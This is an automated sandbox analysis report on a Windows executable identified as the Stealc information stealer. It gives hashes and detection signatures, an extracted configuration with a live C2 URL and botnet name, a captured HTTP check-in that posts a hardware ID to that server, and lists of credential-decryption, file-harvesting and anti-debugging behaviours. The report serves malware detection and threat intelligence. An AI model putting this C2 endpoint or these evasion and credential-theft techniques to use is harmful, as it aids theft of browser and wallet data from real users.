Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1543870
MD5:15716110ba606bed84e305d1d8525eba
SHA1:a51087861dc45958cd52acec71d7255c36398aa1
SHA256:14e0eab38beddaf7adc2997b84bd7777d2ccb898de7f9ce5afe1c0e6008c87f1
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1716 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 15716110BA606BED84E305D1D8525EBA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2073513483.0000000005530000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2114601767.000000000171E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 1716JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 1716JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.e60000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-28T15:28:01.711498+010020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.e60000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E79030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00E79030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E672A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00E672A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6A2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00E6A2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00E6A210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00E6C920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2073513483.000000000555B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2073513483.000000000555B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E740F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00E740F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00E6E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E747C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00E747C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E6F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E61710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E61710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00E6DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E74B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E74B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E73B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00E73B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00E6BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00E6EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E6DF10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCAFHCAKFBFIECAFIIJHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 41 46 48 43 41 4b 46 42 46 49 45 43 41 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 37 43 42 34 35 46 43 37 43 34 32 35 33 38 31 37 36 37 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 46 48 43 41 4b 46 42 46 49 45 43 41 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 46 48 43 41 4b 46 42 46 49 45 43 41 46 49 49 4a 2d 2d 0d 0a Data Ascii: ------BGCAFHCAKFBFIECAFIIJContent-Disposition: form-data; name="hwid"5F7CB45FC7C4253817676------BGCAFHCAKFBFIECAFIIJContent-Disposition: form-data; name="build"tale------BGCAFHCAKFBFIECAFIIJ--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E662D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00E662D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCAFHCAKFBFIECAFIIJHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 41 46 48 43 41 4b 46 42 46 49 45 43 41 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 37 43 42 34 35 46 43 37 43 34 32 35 33 38 31 37 36 37 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 46 48 43 41 4b 46 42 46 49 45 43 41 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 46 48 43 41 4b 46 42 46 49 45 43 41 46 49 49 4a 2d 2d 0d 0a Data Ascii: ------BGCAFHCAKFBFIECAFIIJContent-Disposition: form-data; name="hwid"5F7CB45FC7C4253817676------BGCAFHCAKFBFIECAFIIJContent-Disposition: form-data; name="build"tale------BGCAFHCAKFBFIECAFIIJ--
                Source: file.exe, 00000000.00000002.2114601767.000000000171E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.2114601767.0000000001780000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2114601767.000000000171E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.2114601767.0000000001780000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2114601767.000000000171E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.2114601767.0000000001780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
                Source: file.exe, 00000000.00000002.2114601767.0000000001780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php;
                Source: file.exe, 00000000.00000002.2114601767.0000000001780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpC
                Source: file.exe, 00000000.00000002.2114601767.0000000001780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phps
                Source: file.exe, 00000000.00000002.2114601767.0000000001780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/:
                Source: file.exe, file.exe, 00000000.00000003.2073513483.000000000555B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA00980_2_00EA0098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EBB1980_2_00EBB198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012BC0520_2_012BC052
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E921380_2_00E92138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012B530E0_2_012B530E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA42880_2_00EA4288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECE2580_2_00ECE258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011863C70_2_011863C7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012AF2490_2_012AF249
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EDD39E0_2_00EDD39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EEB3080_2_00EEB308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012BF5030_2_012BF503
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013295920_2_01329592
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA45A80_2_00EA45A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECD5A80_2_00ECD5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E845730_2_00E84573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E8E5440_2_00E8E544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE96FD0_2_00EE96FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA66C80_2_00EA66C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EDA6480_2_00EDA648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED67990_2_00ED6799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EBD7200_2_00EBD720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECF8D60_2_00ECF8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EBB8A80_2_00EBB8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB98B80_2_00EB98B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB48680_2_00EB4868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012B89950_2_012B8995
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012AB8600_2_012AB860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012A988A0_2_012A988A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC8BD90_2_00EC8BD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED4BA80_2_00ED4BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED0B880_2_00ED0B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EDAC280_2_00EDAC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01373DEF0_2_01373DEF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01219DD70_2_01219DD7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB4DC80_2_00EB4DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB5DB90_2_00EB5DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EBBD680_2_00EBBD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E91D780_2_00E91D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECAD380_2_00ECAD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED1EE80_2_00ED1EE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C0F060_2_012C0F06
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA8E780_2_00EA8E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012B6E280_2_012B6E28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012ACE790_2_012ACE79
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012B1EBE0_2_012B1EBE
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00E64610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: kkezmvxm ZLIB complexity 0.9947383536312014
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E79790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00E79790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E73970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00E73970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\MRGRRNGO.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2151424 > 1048576
                Source: file.exeStatic PE information: Raw size of kkezmvxm is bigger than: 0x100000 < 0x1a2400
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2073513483.000000000555B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2073513483.000000000555B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.e60000.0.unpack :EW;.rsrc :W;.idata :W; :EW;kkezmvxm:EW;fehabrus:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;kkezmvxm:EW;fehabrus:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E79BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E79BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x210600 should be: 0x21644b
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: kkezmvxm
                Source: file.exeStatic PE information: section name: fehabrus
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013A2131 push 39306C14h; mov dword ptr [esp], edi0_2_013A217A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E8A0F2 push eax; retf 0_2_00E8A119
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01592172 push ecx; mov dword ptr [esp], esi0_2_01592186
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01592172 push 4EBBBBB8h; mov dword ptr [esp], ecx0_2_01592196
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01592172 push edx; mov dword ptr [esp], 6497968Bh0_2_015921A4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01592172 push ebp; mov dword ptr [esp], 5FF0712Fh0_2_015921C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E8A0DC push eax; retf 0_2_00E8A0F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01369177 push 400D7F64h; mov dword ptr [esp], edx0_2_01369194
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0135B1F3 push 42D088A1h; mov dword ptr [esp], edi0_2_0135B20A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0133C1F9 push ebp; mov dword ptr [esp], ebx0_2_0133C275
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0114D1CB push 79CD2071h; mov dword ptr [esp], ebp0_2_0114D1F4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012CB1C4 push ebp; mov dword ptr [esp], ebx0_2_012CB1E8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01337031 push edi; mov dword ptr [esp], edx0_2_013371C4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01592007 push esi; mov dword ptr [esp], edx0_2_01592050
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01592007 push edi; mov dword ptr [esp], edx0_2_015920C6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01592007 push edi; mov dword ptr [esp], ebp0_2_0159210C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01592007 push edi; mov dword ptr [esp], 3C6DE9A2h0_2_0159211A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0159203F push esi; mov dword ptr [esp], edx0_2_01592050
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0159203F push edi; mov dword ptr [esp], edx0_2_015920C6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0159203F push edi; mov dword ptr [esp], ebp0_2_0159210C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0159203F push edi; mov dword ptr [esp], 3C6DE9A2h0_2_0159211A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012BC052 push 0E3A3DEEh; mov dword ptr [esp], esp0_2_012BC05C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012BC052 push 182D2F44h; mov dword ptr [esp], esi0_2_012BC0B4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012BC052 push edx; mov dword ptr [esp], ecx0_2_012BC105
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012BC052 push ecx; mov dword ptr [esp], eax0_2_012BC1CD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012BC052 push 0123CBD3h; mov dword ptr [esp], ebx0_2_012BC20F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012BC052 push ecx; mov dword ptr [esp], eax0_2_012BC246
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012BC052 push 10AEA30Bh; mov dword ptr [esp], edx0_2_012BC268
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012BC052 push 58942800h; mov dword ptr [esp], ecx0_2_012BC273
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012BC052 push 66713CCDh; mov dword ptr [esp], ebx0_2_012BC2C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012BC052 push edi; mov dword ptr [esp], eax0_2_012BC2F0
                Source: file.exeStatic PE information: section name: kkezmvxm entropy: 7.953994841848818

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
